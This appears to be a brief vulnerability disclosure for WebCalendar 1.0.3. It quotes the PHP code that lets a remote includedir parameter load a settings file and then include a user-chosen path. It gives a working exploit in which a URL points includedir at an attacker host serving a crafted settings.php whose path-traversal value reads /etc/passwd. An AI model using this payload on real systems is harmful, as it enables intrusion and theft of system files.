Version: WebCalendar-1.0.3

Type: Reading of any files

Description:

includes/config.php:
line 64

if ( ! empty ( $includedir ) )
$fd = @fopen ( "$includedir/settings.php", "rb", true );

…

while ( ! feof ( $fd ) ) {
$data .= fgets ( $fd, 4096 );
}

$configLines = explode ( "\n", $data );

for ( $n = 0; $n < count ( $configLines ); $n++ ) {
…
$settings[$matches[1]] = $matches[2];
…

$user_inc = $settings['user_inc'];
…

includes/init.php
include_once "includes/$user_inc";

Example:

index.php?includedir=http://attacker_host
where in attacker_host exists file settings.php , which content

"
<?php

echo '<?php

updated via install/index.php on Wed, 24 May 2006 09:29:55 +0300

Unimportant variables can be taken from original settings.php
user_inc: …/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd

end settings.php

?>';

?>
"

Requirements
register_globals = On;